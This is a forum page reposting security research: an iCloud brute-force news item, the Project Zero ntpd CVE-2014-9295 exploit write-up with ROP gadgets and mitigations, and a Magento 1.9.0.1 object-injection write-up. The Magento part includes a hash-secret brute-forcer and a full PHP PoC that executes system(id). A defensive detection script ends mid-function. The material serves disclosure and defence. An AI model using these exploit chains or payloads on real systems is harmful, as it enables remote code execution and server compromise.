Everything posted by Nytro

  1. Hacker Releases New Tool to Brute-Force Attack iCloud Passwords

Posted on January 3, 2015 by Waqas

Reports emerged of a new tool claiming the ability to successfully carry out password dictionary attacks on any iCloud account without being detected by Apple’s security.

It seems that the vulnerability has just been patched and anyone trying to use this tool is being locked out of repeated password attempts. Earlier in September, Apple had reported that it had already patched up one hole that allowed brute-force attacks like these.

The tool’s source code, released on GitHub, showed nothing extremely advanced. It just attempts every possible word out of its given 500-word list and tries it out for the password of any iCloud account email. The tool, judging from its source code, does not show that it will succeed at cracking passwords. Passwords that are not from the 500-word dictionary present in this tool are safe but it still posed a risk as many people do use simple dictionary words as their iCloud passwords.

While this tool was crude and unsuccessful, more weathered hackers could develop it and use a much larger word list to use than this one.

Apple appears to have resolved the hack now which simply relied on pretending to be an iPhone device. What is surprising is the fact that Apple allows indefinite requests without turning towards password locking after a certain number of requests for instance.

At the same time this was happening, the Photos app for iCloud has been pulled and it is not yet clear if there is a connection between both stories.

Source: http://hackread.com/brute-force-attack-icloud-passwords/
  2. Finding and exploiting ntpd vulnerabilities

Posted by Stephen Röttger, Time Lord

[Foreword by Chris Evans: this post by Stephen represents the first Project Zero guest blog post. From time to time, we’ll be featuring guest blog posts for top-tier security research. In this instance, we’ve been impressed by the remotely exploitable nature of these vulnerabilities, as well as the clever chain of bugs and quirks that eventually leads to remote code execution. You’ve probably seen the recent ntpd vulnerability disclosures and this blog post tells the story from one of the researchers who discovered the issues. Over to Stephen…]

A few months ago I decided to get started on fuzzing. I chose the reference implementation of the Network Time Protocol (NTP), ntpd, as my first target, since I have some background with NTP and the protocol seemed simple enough to be a good learning experience. Also, ntpd is available for many platforms and widely in use, including being part of the default OS X installation.

While looking at the source to get a better understanding of the protocol I noticed that its processing is far more complex than I expected. Besides the time synchronization packets, ntpd supports symmetric and asymmetric (Autokey) authentication and so called private and control mode packets that let you query the daemon for stats or perform configuration changes (if I’m not mistaken, this is the protocol spoken by ntpdc and ntpq respectively).

I quickly stumbled over a bug in the code processing Autokey protocol messages and decided to dig deeper and perform a manual code review of the other parts as well. This resulted in finding CVE-2014-9295 and writing my first ever OS X exploit for which I will present a write up today.

tl;dr: a global buffer overflow can be triggered on common configurations by an attacker on the local network through an IPv6 packet with a spoofed ::1 source.
If your ntpd is not patched yet, add nomodify or noquery to every restrict line in your config, even the ones for localhost.

But enough of that, let's jump into the details.

The Bug

The most severe bug that turned out to be exploitable on OS X Mavericks is a buffer overflow in the code which handles control packets. Control mode responses are fragmented if they exceed the size of the buffer used to store them, as implemented in the following function:

    static void
    ctl_putdata(
        const char *dp,
        unsigned int dlen,
        int bin /* set to 1 when data is binary */
        )
    {
        //[...]
        /*
         * Save room for trailing junk
         */
        if (dlen + overhead + datapt > dataend) {
            /*
             * Not enough room in this one, flush it out.
             */
            ctl_flushpkt(CTL_MORE);
        }
        memmove((char *)datapt, dp, (unsigned)dlen);
        datapt += dlen;
        datalinelen += dlen;
    }

As you can see, if the data to be written doesn't fit into the remaining buffer space <ctl_flushpkt> is called, which will send out the current packet and reset the datapt to point to the beginning of the buffer. However, memmove will be called in any case and if dlen is bigger than the total buffer size it will overflow the buffer. Note that the overflow happens in a global buffer and thus stack cookies won’t help in this case.

So let's see if we can find a code path that will trigger this. In most invocations, the data to be written comes from a fixed size buffer that is smaller than the output buffer and thus won't overflow.

The function <configure> which handles ntp.conf style remote configurations sent by a privileged client will send any error messages back to the client using <ctl_putdata>. By sending a configuration with enough errors, the error message string will exceed the buffer size. However, the fact that the written data is restricted to a fixed set of error messages makes exploitation difficult.

A more powerful overwrite can be found in <read_variables>.
The NTP daemon keeps a list of name=value variables that can be set through the configuration and read back with a control mode packet. If a variable bigger than the output buffer is read back, it will overflow and corrupt whatever is stored behind the buffer.

Setting Variables

So how can we set variables? As mentioned before, there is a control mode packet through which we can send configuration commands to ntpd and thereby set any variable we want. But this is obviously a privileged operation and protected by two mechanisms:

  • Access to private and control mode queries can be restricted in ntp.conf based on the source IP. Default installations usually prohibit these queries for every source IP except for 127.0.0.1 and ::1. This is what e.g. Ubuntu, Debian and OS X do.
  • The packet needs to be authenticated with a MAC for which the shared key has to be specified in ntp.conf, which again shouldn't be set on default installations.

Bypassing the first one is actually not that hard if you’re on the same network. As we all know IP addresses can be spoofed. But can we spoof the address of localhost? It turns out OS X and the Linux Kernel behave similarly in this case. Any IP packet arriving on an external interface and with the source IP 127.0.0.1 will be dropped immediately. But if we use IPv6 instead we can actually spoof ::1 and send control mode packets to the daemon (some Linux distributions have firewall rules in place that protect against this, e.g. Red Hat). Thus, if we are on the same local network, we can send spoofed packets to the link-local address of the target and bypass the IP restrictions.

But what about requirement number 2? This one sounds tough: how can you have a valid MAC if no key is specified?

Quest for the Key

Let’s back up and discuss a little bit of background first. Through ntp.conf you can specify multiple keys and assign key ids to them.
These key ids can then be assigned to different roles, i.e., a requestkey can be used to authenticate private mode packets and a controlkey is used for control mode packets. We need a controlkey to send our configuration requests but a requestkey would actually suffice since a private mode packet exists that will set the controlkey id to a specified value.

And that’s where another bug comes into play that was discovered by Neel Mehta. Let’s take a look what ntpd does if no requestkey was specified in the config:

    /* if doesn't exist, make up one at random */
    if (authhavekey(req_keyid)) {
        //[...]
    } else {
        unsigned int rankey;

        rankey = ntp_random();
        req_keytype = NID_md5;
        req_hashlen = 16;
        MD5auth_setkey(req_keyid, req_keytype,
            (u_char *)&rankey, sizeof(rankey));
        authtrust(req_keyid, 1);
    }

That’s right, if no key was specified, a random 31 bit key will be generated, which means we can brute force it by sending 2^31 packets to the vulnerable daemon with a 68 byte payload each. But wait, there’s more! The random key is created by a custom random number generator implementation that is seeded with a 32 bit value and we can get the output of this generator through standard time synchronization requests. Part of the receive timestamp that we get by querying the time from the daemon is a random value from this generator and each query allows us to recover around 12 bits of the output which we can use to brute force the seed offline. However, the feasibility of a naive brute force approach highly depends on the uptime of ntpd since the number of random values that have been created will increase the search space. To give an idea of the time complexity, my single core implementation takes a few hours on my laptop even if I limit the search space to the first 1024 random values, but you can throw more cores at the problem or precompute as much as possible and build a lookup table.
At this point, we have an overflow in a global buffer that can be triggered remotely on standard configurations. Neat!

The Overflow

Now that we have the key, we can send configuration commands and write arbitrary variables. When reading them back from the daemon, you can optionally specify the variables that you’re interested in. ntpd will iterate through them, write them (separated by a comma) to the global buffer through the function <ctl_putdata> and finally flush them out with <ctl_flushpkt>.

There are still some restrictions on this overflow that make exploitation notably harder.

  • We can’t write 0x00, 0x22 (“) and 0xff.
  • Some data will be appended after our overwrite. That is, “, “ between two variable writes and “\r\n” on the final flush.

How to proceed from here depends on which OS/distribution/architecture you target since protection mechanisms and the memory layout of the global data structures will differ. A few examples:

  • On x64, the inability to write null bytes prevents us from completely overwriting pointers since the most significant bytes are null bytes. This poses a problem since “\r\n” is appended to our data, which will limit the control over partial pointer overwrites. On x86 however, this shouldn’t be an issue.
  • At least on Debian, some compile time protections are not enabled for ntpd. I.e. the executable is not position independent and the global offset table (GOT) is writable during runtime.
  • On OS X Mavericks, the datapt variable which points to the current position in the buffer is located after the buffer itself while on Debian and Ubuntu the pointer is in front of the buffer and can’t be overwritten.

I chose to try my luck on a 64 bit OS X Mavericks. Since I have no prior experience with OS X, please bear with me if I missed something obvious or use the wrong nomenclature.

The environment looks like this:

  • The binary, stack, heap and shared libraries are individually randomized with 16 bit entropy.
  • The address of the shared libraries is randomized at boot time.
  • On a crash, ntpd is restarted automatically with approximately 10 seconds delay.
  • ntpd is compiled with stack cookies (which doesn’t matter in our case since we overflow a global buffer).
  • The global offset table (GOT) is writable during runtime.

For a reliable exploit we will have to bypass ASLR somehow, so let’s leak some pointers. This one is actually quite easy since the datapt variable, which as you might remember points to the current write location, is located after the buffer itself:

We just have to overwrite the two least significant bytes of the datapt variable and as a consequence, ntpd will miscalculate the length and send you data after the buffer which leaks a pointer into the ntpd binary as well as a heap pointer. After that, the datapt variable is conveniently reset to point to the beginning of the buffer again.

Note that usually “\r\n” would get appended to our data and corrupt the partial pointer overwrite. But since we overwrite the write pointer itself, the newline sequence will be written to the new destination instead.

With the same trick, we can turn the bug into a slightly restricted write-what-where primitive: partially overwrite the datapt variable to point to where you want to write (minus a few bytes to make room for the separator) and then write arbitrary data with a second ntpd variable. Again, the fact that garbage is appended to our data is no issue for the first write since it will be written to the new location instead and won’t corrupt the pointer. Note that we can only write arbitrary data in front of the buffer since a higher address will trigger a flush and reset the datapt (after writing the separator, so this might still be used to corrupt a length field).

Unfortunately, the appended bytes still pose a problem. If we try to do a partial pointer overwrite through this, the “\r\n” sequence will always corrupt the pointer before it is used. Well, almost always.
The GOT, and this took me way too long to figure out, is actually writable and used twice before our overwrite gets corrupted by the addition of “\r\n”. Between writing a variable and flushing the packet, <strlen> and <free> are called. That means, if we partially overwrite the GOT entry of either of those functions, the pointer will be used before it gets corrupted and we control rip.

Info leak, again

Since we know the base address of the binary and can overwrite GOT entries we can just find a nice gadget in the binary and jump to it, right? Unfortunately, that doesn’t work. To see why, let’s take a look at a couple of example addresses from the binary and libsystem_c:

    0x000000010641c000 /usr/sbin/ntpd
    0x00007fff88791000 /usr/lib/system/libsystem_c.dylib

The addresses of system libraries have two null bytes as their most significant bytes while the binary address starts with three null bytes. Thus if we overwrite the GOT entry of <strlen> with an address from the binary, there will still be 0x7f byte left from the library address (remember: we can’t write nul bytes).

To obtain the address of a system library we could try to turn our overwrite into a better leak, e.g. by overwriting some length field. But there is a lazier approach due to a weakness of ASLR on OS X Mavericks. The most common libraries are loaded in the split library region (as “man vmmap” calls it) which is shared by all processes in the system. The load address of this region is randomized during boot. This means that the addresses stay the same if a program is restarted and that even libraries which are not used by the program are loaded in its address space and can be used for ROP gadgets. This and the fact that ntpd is restarted automatically when it crashes makes it possible to brute force the library addresses for <strlen> (libsystem_c) or <free> (libsystem_malloc) bytewise.
If you reboot your system a few times, you can observe that the load address of the split library region is always of the form 0x00007fff8XXXX000, providing 16 bit of entropy or 17 bit in our case since the region can extend to 0x00007fff9XXXX000. Let’s use the libsystem_c address from the example before: 0x00007fff88791000. We know that <strlen> is located at offset 0x1720 and thus 0x00007fff88792720 is the address we’re trying to brute force.

We start by brute forcing the upper 4 bits of the second least significant byte. We overwrite the GOT entry of <strlen> with 0x0720, resulting in the new entry 0x00007fff88790720. Since we didn’t hit the correct address ntpd will crash and won’t send us any replies anymore. In that case, we increment the address to 0x1720 and try it again. If ntpd does send us a reply, which will happen at 0x2720, we know that we found the correct byte and continue with the next one (0x012720). This way, we can recover the libsystem_c address in 304 tries (4 bit + 8 bit + 5 bit) in the worst case. OS X will restart ntpd approximately every 10 seconds but you will need to brute force the key anew for every try, so bring your supercomputer. Also, if you’re unlucky you will run into an endless loop and ntpd has to be killed manually.

Arbitrary Code Execution

If it wasn’t for the fact that ntpd runs in a sandbox we would be finished now. Just overwrite the GOT entry of <strlen> with the address of <system> and execute arbitrary commands since it will get called with a user controlled string. But all you get out of this is the following line in /var/log/system.log:

    sandboxd[405] ([41]): ntpd(41) deny process-exec /bin/sh

Instead, we need to find a nice gadget to control the stack pointer and make it point to a ROP chain. The usual way to do this would be a stack pivot but the data we control on the stack is limited. On the stack, we control data in 3 locations which we can fill with arbitrary pointers, this time without any restrictions.
Besides that, we completely control the contents of a global buffer at a known address in the binary and if we can get the stack pointer (rsp) to point to this buffer we can execute an arbitrary ROP chain.

Since our exploit overwrites the GOT, we only control the instruction pointer once, i.e. we can’t chain multiple calls. Thus, our first gadget needs to increment the stack pointer by either 0x80, 0x90 or 0xb8 so that it will use one of our addresses on return and do something useful at the same time. Fortunately, I found the following gadget in libsystem_c.dylib:

    add rsp, 0x88
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15
    pop rbp
    ret

This gadget returns to our address at rsp+0xb8 and at the same time loads the value from rsp+0x90 into r12. Since we now control a register, we can chain gadgets that end in a call qword [reg+n] where reg points to the global buffer that we control. For example, the second gadget looks like this:

    mov rdi, r12
    mov rsi, r14
    mov rdx, r13
    call qword [r12+0x10]

With a few gadgets of this kind, we control rsi and can load it into rsp:

    push rsi
    pop rsp
    xor eax, eax
    pop rbp
    ret

And with that, we’re done. This will crash on a ret instruction with rsp pointing to user-controlled and thus arbitrary code execution is straightforward. Since we control the stack, we can build a ROP chain that loads and executes shellcode and from there try to break out of the sandbox by attacking the kernel or IPC channels. But that is left as an exercise for the reader.

Exploit Summary

  • Send a bunch of regular time synchronization requests to leak random values.
  • Brute force the seed and calculate the requestkey (which has the keyid 65535).
  • Send a private mode packet signed with the requestkey and with a spoofed source IP of ::1 to the server to set the controlkey id to 65535.
  • Send a configuration change to lift all restrictions for our IP address.
  • Add our IP to get async notifications (we have to do this, since we overwrite a flag later that triggers if responses are sent directly or asynchronously).
  • Trigger the overflow by setting a long variable and reading it back and leak the binary base address.
  • Use the overflow again as a write-what-where primitive to brute force the address of <strlen> bytewise.
  • Prepare the data on the stack and in the global buffer.
  • Call the gadgets to control rsp and execute a ROP chain.

Mitigation

In case your ntpd is not patched yet, these bugs can be effectively protected against through changes in your ntp.conf. The vulnerable <ctl_putdata> function is used by the processing of control mode packets and this can be blocked completely by adding “noquery” to every restrict line in the configuration. As explained before, it is important to also add “noquery” to the restrict lines for localhost, since the IP based access restrictions can often be bypassed through spoofing. But note that this will prevent ntpq from working and you won’t be able to query for peer information and other stats anymore.

For example, if your configuration includes multiple “restrict” lines:

    restrict default kod nomodify notrap nopeer noquery
    restrict -6 default kod nomodify notrap nopeer noquery
    restrict 127.0.0.1
    restrict -6 ::1

make sure that “noquery” is included in all of those:

    restrict default kod nomodify notrap nopeer noquery
    restrict -6 default kod nomodify notrap nopeer noquery
    restrict 127.0.0.1 noquery
    restrict -6 ::1 noquery

Posted by Chris Evans at 4:28 AM

Source: Project Zero: Finding and exploiting ntpd vulnerabilities
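
The mitigation described in the post above can be checked mechanically. The following Python audit is an added example, not code from the Project Zero post or from the ntp project: it reports every restrict line that still answers control mode queries. The function names are hypothetical, the two sample configurations are the ones quoted in the post, and treating the ntp.conf flag "ignore" as equivalent for this purpose is an assumption of the example.

```python
# Added example: audit ntp.conf "restrict" lines for the noquery mitigation.

# Flags that stop ntpd from answering control mode (ntpq) queries.
# Assumption of this example: "ignore" (deny all packets) also qualifies.
QUERY_BLOCKING_FLAGS = {"noquery", "ignore"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# The "before" and "after" configurations quoted in the post.
SAMPLE_BEFORE = """\
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict -6 ::1
"""
SAMPLE_AFTER = """\
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1 noquery
restrict -6 ::1 noquery
"""


def parse_restrict(line):
    """Return (address, flags) for a restrict line, or None for other lines."""
    tokens = line.split("#", 1)[0].split()  # drop comments, then tokenize
    if not tokens or tokens[0] != "restrict":
        return None
    rest = tokens[1:]
    if rest and rest[0] in ("-4", "-6"):  # address family qualifier
        rest = rest[1:]
    if not rest:
        return None
    address, rest = rest[0], rest[1:]
    if len(rest) >= 2 and rest[0] == "mask":  # "mask <netmask>" is not a flag
        rest = rest[2:]
    return address, set(rest)


def audit(conf_text):
    """List restrict entries that lack a query-blocking flag."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        parsed = parse_restrict(line)
        if parsed is None:
            continue
        address, flags = parsed
        if flags & QUERY_BLOCKING_FLAGS:
            continue
        findings.append({
            "line": lineno,
            "address": address,
            # Loopback entries matter because ::1 can be spoofed on the LAN.
            "loopback": address in LOOPBACK,
            # nomodify is the other flag the post's tl;dr recommends.
            "nomodify": "nomodify" in flags,
            "text": line.strip(),
        })
    return findings


if __name__ == "__main__":
    for name, conf in (("before", SAMPLE_BEFORE), ("after", SAMPLE_AFTER)):
        results = audit(conf)
        print(f"{name}: {len(results)} restrict line(s) without noquery")
        for f in results:
            where = "loopback" if f["loopback"] else "non-loopback"
            print(f"  line {f['line']} ({where}): {f['text']}")
```

Run against a real configuration by passing the contents of ntp.conf to audit(); an empty result means every restrict entry blocks control mode queries.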
  3. Magento 1.9.0.1 PHP Object Injection

Recently, I found a PHP Object Injection (POI) vulnerability in the administrator interface of Magento 1.9.0.1. Magento is an e-commerce software written in PHP that was acquired by Ebay Inc. A bug bounty program is run that attracts with a 10,000$ bounty for remote code execution bugs. A POI vulnerability can lead to such a remote code execution, depending on the gadget chains the attacker is able to trigger.

Sadly I stopped investigating the POI vulnerability and resumed 1 week later – a fatal error. When I continued investigating exploitable gadget chains, Magento pushed an update in the meantime that patches several security issues. The POI is not mentioned anywhere, but it is fixed by replacing the affected unserialize() call with json_decode().

So no bug bounty, but the exploitation is still worth a look at because it includes a hash verification bypass and a cool gadget that allowed full code coverage in gadget chaining. In the end, an attacker can execute arbitrary code on the targeted server. However, administrator privileges are required.

1. PHP Object Injection

In Magento 1.9.0.1, the method tunnelAction() of the administrator’s DashboardController is affected by a POI vulnerability. It deserializes user data supplied in the ga parameter.

    // app/code/core/Mage/Adminhtml/controllers/DashboardController.php
    public function tunnelAction()
    {
        $gaData = $this->getRequest()->getParam('ga');
        $gaHash = $this->getRequest()->getParam('h');
        if ($gaData && $gaHash) {
            $newHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData);
            if ($newHash == $gaHash) {
                if ($params = unserialize(base64_decode(urldecode($gaData)))) {

A closer look reveals, however, that the base64 encoded, serialized data is protected with a hash from manipulation.
The hash of the gaData is generated with the method getChartDataHash() and is then compared to the hash supplied in the h parameter. Only if both hashes match, the data is deserialized.

Let's get some sample data. The tunnelAction() is triggered, when the dashboard graph is loaded.

    // app/design/adminhtml/default/default/template/dashboard/graph.phtml
    <img src="<?php echo $this->getChartUrl(false) ?>

Here, the method getChartUrl() serializes graph parameters and creates the gaHash of the base64 encoded gaData.

    // app/code/core/Mage/Adminhtml/Block/Dashboard/Graph.php
    function getChartUrl()
    {
        ...
        $gaData = urlencode(base64_encode(serialize($params)));
        $gaHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData);
        $params = array('ga' => $gaData, 'h' => $gaHash);
        return $this->getUrl('*/*/tunnel', array('_query' => $params));
    }

The following request is generated and can be intercepted:

    /index.php/admin/dashboard/tunnel/key/803e506c399449c72975fc1fcc2c0435/
    ?ga=eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9
    &h=61f3757d04b665baac6f8176a2012337

We can base64 decode the data in the ga parameter (line 2) and modify the serialized parameters in order to exploit the PHP Object Injection vulnerability. However, we then have to generate a valid hash for our malformed data and replace it with the hash in the h parameter (line 3).
Otherwise, our manipulated data is not deserialized.

2. Hash Verification

Let's have a look at how the hash is generated and if we can forge it for manipulated data. The hash is created in the getChartDataHash() method by calculating the MD5 hash of the base64 encoded data concatenated with a secret. If we know this secret, we can generate our own hash for our modified gaData.

    // app/code/core/Mage/Adminhtml/Helper/Dashboard/Data.php
    public function getChartDataHash($data)
    {
        $secret = (string)Mage::getConfig()->getNode(Mage_Core_Model_App::XML_PATH_INSTALL_DATE);
        return md5($data . $secret);
    }

Luckily, the secret is cryptographically very weak. As the constant’s name suggests, the config value XML_PATH_INSTALL_DATE refers to the date of the Magento installation in RFC 2822 format. For example, the secret date could look like the following:

    Sat, 1 Nov 2014 21:08:46 +0000

Assuming that the installation was performed maximum 1 year ago, there are less than 31 * 12 * 24*60*60 = 32 Mio possibilities. We can take the intercepted sample data to bruteforce the secret date locally. Furthermore, we can narrow down the possible date window by observing the HTTP response header of the targeted web server. For example, the HTTP response for a request of the favicon file tells us its last modification date:

    Request:
    GET /favicon.ico HTTP/1.0

    Response
    If-Modified-Since: Wed, 05 Nov 2014 09:06:45 GMT

This should equal to the exact date when the installation files were copied to the server. We can then assume, that the installation was performed at least within the same month when this file was extracted. Also, it tells us the timezone (here GMT) used by the server.
This leaves us only with 30 * 24*60*60 = 2.6 Mio possibilities which can be bruteforced within a few seconds.

    $gaData = 'eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9';
    $hash = '61f3757d04b665baac6f8176a2012337';
    date_default_timezone_set('GMT');
    // Wed, 05 Nov 2014 09:06:45 GMT
    $timestamp = mktime(9, 6, 45, 11, 5, 2014);
    $today = time();
    for($i=0;$i<2592000 && $timestamp<$today; $i++)
    {
        $secret = date(DATE_RFC2822, $timestamp++);
        if(md5($gaData . $secret) === $hash) {
            echo $secret;
            break;
        }
    }

Once we obtained the secret, we can alter the serialized data and create a valid hash for it, so our data is deserialized by the server. That means we can inject arbitrary objects into the application and trigger gadget chains by invoking the object’s magic methods (for more details please refer to our paper).

3. Gadget Chain

Magento’s code base is huge and many interesting initial gadgets (magic methods) can be found that trigger further gadgets (methods). For example, the usual File Deletion and File Permission Modification calls can be triggered in order to delete files. This is partly interesting in Magento, because the deletion of the /app/.htaccess file allows to access the /app/etc/local.xml file which contains the crypto key. However, since we own already administrative privileges, we are interested in more severe vulnerabilities.

It turns out, that the included (and autoloaded) Varien library provides all gadgets we need to execute arbitrary code on the server.
The deprecated class Varien_File_Uploader_Image provides a destructor as our initial gadget that allows us to jump to arbitrary clean() methods.

    // lib/Varien/File/Uploader/Image.php:357
    function __destruct()
    {
        $this->uploader->Clean();
    }

This way, we can jump to the clean() method of the class Varien_Cache_Backend_Database. It fetches a database adapter from the property _adapter and executes a TRUNCATE TABLE query with its query() method. The table name can be controlled by the attacker by setting the property _options['data_table'].

    // lib/Varien/Cache/Backend/Database.php
    public function clean($mode = Zend_Cache::CLEANING_MODE_ALL, $tags = array())
    {
        $adapter = $this->_adapter;
        switch($mode) {
            case Zend_Cache::CLEANING_MODE_ALL:
                if ($this->_options['store_data']) {
                    $result = $adapter->query('TRUNCATE TABLE '.$this->_options['data_table']);
                }
            ...
        }
    }

If we provide the Varien_Db_Adapter_Pdo_Mysql as database adapter, its query() method passes along the query to the very interesting method _prepareQuery(), before the query is executed.

    // lib/Varien/Db/Adapter/Pdo/Mysql.php
    public function query($sql, $bind = array())
    {
        try {
            $this->_checkDdlTransaction($sql);
            $this->_prepareQuery($sql, $bind);
            $result = parent::query($sql, $bind);
        } catch (Exception $e) {
            ...
        }
    }

The _prepareQuery() method uses the _queryHook property for reflection. Not only the method name is reflected, but also the receiving object. This allows us to call any method of any class in the Magento code base with control of the first argument – a really cool gadget found by the new RIPS prototype.

    // lib/Varien/Db/Adapter/Pdo/Mysql.php
    protected function _prepareQuery(&$sql, &$bind = array())
    {
        ...
        // Special query hook
        if ($this->_queryHook) {
            $object = $this->_queryHook['object'];
            $method = $this->_queryHook['method'];
            $object->$method($sql, $bind);
        }
    }

From here it wasn’t hard to find a critical method that operates on its properties or its first parameter. For example, we can jump to the filter() method of the Varien_Filter_Template_Simple class. Here, the regular expression of a preg_replace() call is built dynamically with the properties _startTag and _endTag that we control. More importantly, the dangerous eval modifier is already appended to the regular expression, which leads to the execution of the second preg_replace() argument as PHP code.

    // lib/Varien/Filter/Template/Simple.php
    public function filter($value)
    {
        return preg_replace('#'.$this->_startTag.'(.*?)'.$this->_endTag.'#e', '$this->getData("$1")', $value);
    }

In the executed PHP code of the second preg_replace() argument, the match of the first group is used ($1). Important to note are the double quotes that allow us to execute arbitrary PHP code by using curly brace syntax.

4. Exploit

Now we can put everything together. We inject a Varien_File_Uploader_Image object that will invoke the class’ destructor. In the uploader property we create a Varien_Cache_Backend_Database object, in order to invoke its clean() method. We point the object’s _adapter property to a Varien_Db_Adapter_Pdo_Mysql object, so that its query() method also triggers the valuable _prepareQuery() method.
In the _options['data_table'] property, we can specify our PHP code payload, for example:

```
{${system(id)}}RIPS
```

We also append the string RIPS as delimiter. Then we point the _queryHook property of the Varien_Db_Adapter_Pdo_Mysql object to a Varien_Filter_Template_Simple object and its filter method. This method will be called via reflection and receives the following argument:

```
TRUNCATE TABLE {${system(id)}}RIPS
```

When we now set the Varien_Filter_Template_Simple object’s property _startTag to TRUNCATE TABLE and the property _endTag to RIPS, the first match group of the regular expression in the preg_replace() call will be our PHP code. Thus, the following PHP code will be executed:

```php
$this->getData("{${system(id)}}")
```

In order to determine the variable’s name, the system() call will be evaluated within the curly syntax. This leads us to execution of arbitrary PHP code or system commands.
PoC:

```php
class Zend_Db_Profiler {
    protected $_enabled = false;
}

class Varien_Filter_Template_Simple {
    protected $_startTag;
    protected $_endTag;

    public function __construct() {
        $this->_startTag = 'TRUNCATE TABLE ';
        $this->_endTag = 'RIPS';
    }
}

class Varien_Db_Adapter_Pdo_Mysql {
    protected $_transactionLevel = 0;
    protected $_queryHook;
    protected $_profiler;

    public function __construct() {
        $this->_queryHook = array();
        $this->_queryHook['object'] = new Varien_Filter_Template_Simple;
        $this->_queryHook['method'] = 'filter';
        $this->_profiler = new Zend_Db_Profiler;
    }
}

class Varien_Cache_Backend_Database {
    protected $_options;
    protected $_adapter;

    public function __construct() {
        $this->_adapter = new Varien_Db_Adapter_Pdo_Mysql;
        $this->_options['data_table'] = '{${system(id)}}RIPS';
        $this->_options['store_data'] = true;
    }
}

class Varien_File_Uploader_Image {
    public $uploader;

    public function __construct() {
        $this->uploader = new Varien_Cache_Backend_Database;
    }
}

$obj = new Varien_File_Uploader_Image;
$b64 = base64_encode(serialize($obj));
$secret = 'Sat, 1 Nov 2014 21:08:46 +0000';
$hash = md5($b64 . $secret);
echo '?ga='.$b64.'&h='.$hash;
```

The POI was straight-forward but we had to circumvent a hash verification first and find nice gadgets. A reflection injection allowed us to trigger almost arbitrary gadget chains through the entire code base that in the end allowed remote code execution. In the next post we have a look at another POI I played with lately, but triggering the POI itself will be more tricky.

Sursa: https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/
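For defenders, the chain above is visible in request logs: the `ga` parameter carries a base64-encoded PHP-serialized value that contains objects. The following detection sketch is an added example, not code from the article or from Magento; it assumes the parameter should only ever hold scalars and arrays, and the host name, the `h` value and the sample payloads are constructed.

```python
import base64
from urllib.parse import parse_qs, urlencode, urlsplit

MAX_DEPTH = 32  # refuse pathological nesting instead of exhausting the stack


def _expect(data, pos, token):
    """Check that `token` sits at `pos`; return the position just past it."""
    if data[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def _number(data, pos):
    """Read an unsigned decimal terminated by ':'; return (value, next position)."""
    end = data.index(b":", pos)  # ValueError when the terminator is missing
    if not data[pos:end].isdigit():
        raise ValueError(f"bad length or count at offset {pos}")
    return int(data[pos:end]), end + 1


def _class_name(data, pos, found):
    """Read `LEN:"Name":` from an object header and record the class name."""
    length, pos = _number(data, pos)
    pos = _expect(data, pos, b'"')
    found.append(data[pos:pos + length].decode("latin-1"))
    return _expect(data, pos + length, b'":')


def _walk(data, pos, found, depth=0):
    """Consume one serialized value at `pos`; return the position after it."""
    if depth > MAX_DEPTH:
        raise ValueError("nesting too deep")
    tag = data[pos:pos + 1]
    if tag == b"N":
        return _expect(data, pos, b"N;")
    pos = _expect(data, pos + 1, b":")
    if tag in (b"b", b"i", b"d", b"r", b"R"):  # scalars and back-references
        return data.index(b";", pos) + 1
    if tag == b"s":  # skip the body by its declared length, never by scanning
        length, pos = _number(data, pos)
        return _expect(data, _expect(data, pos, b'"') + length, b'";')
    if tag in (b"a", b"O"):
        if tag == b"O":
            pos = _class_name(data, pos, found)
        count, pos = _number(data, pos)
        pos = _expect(data, pos, b"{")
        for _ in range(2 * count):  # alternating key, value
            pos = _walk(data, pos, found, depth + 1)
        return _expect(data, pos, b"}")
    raise ValueError(f"unknown type tag {tag!r}")  # includes 'C:' custom objects


def object_classes(serialized):
    """Return the class names of all objects inside one PHP-serialized value."""
    found = []
    if _walk(serialized, 0, found) != len(serialized):
        raise ValueError("trailing bytes after the serialized value")
    return found


def inspect_url(url, param="ga"):
    """Classify a request URL: ('clean' | 'objects' | 'malformed', class names)."""
    values = parse_qs(urlsplit(url).query).get(param)
    if not values:
        return "clean", []
    raw = values[0].replace(" ", "+")  # parse_qs decodes an unescaped '+' as a space
    try:
        classes = object_classes(base64.b64decode(raw, validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        return "malformed", []
    return ("objects" if classes else "clean"), classes


def _s(text):  # constructed-sample helper: one serialized string
    return b's:%d:"%s";' % (len(text), text)


def _obj(cls, props):  # constructed-sample helper: one serialized object
    body = b"".join(_s(name) + value for name, value in props)
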